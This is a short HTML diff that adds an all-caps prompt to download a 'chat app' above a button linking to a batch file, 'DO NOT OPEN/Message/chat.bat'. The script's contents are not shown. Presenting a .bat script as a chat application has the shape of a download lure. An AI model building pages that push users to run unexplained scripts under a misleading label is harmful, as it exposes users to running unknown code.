--- a/index.html
+++ b/index.html
@@ -4,6 +4,9 @@
 </head>
 <body>
 <body>
+  <em>
+   IF YOU WANT TO DOWNLOAD THE CHAT APP FOR COMPUTERS CLICK THIS
+  </em>
 <input type="button" value="Download Now!" onclick="window.location = 'DO NOT OPEN/Message/chat.bat';">
 </body>
 </html>
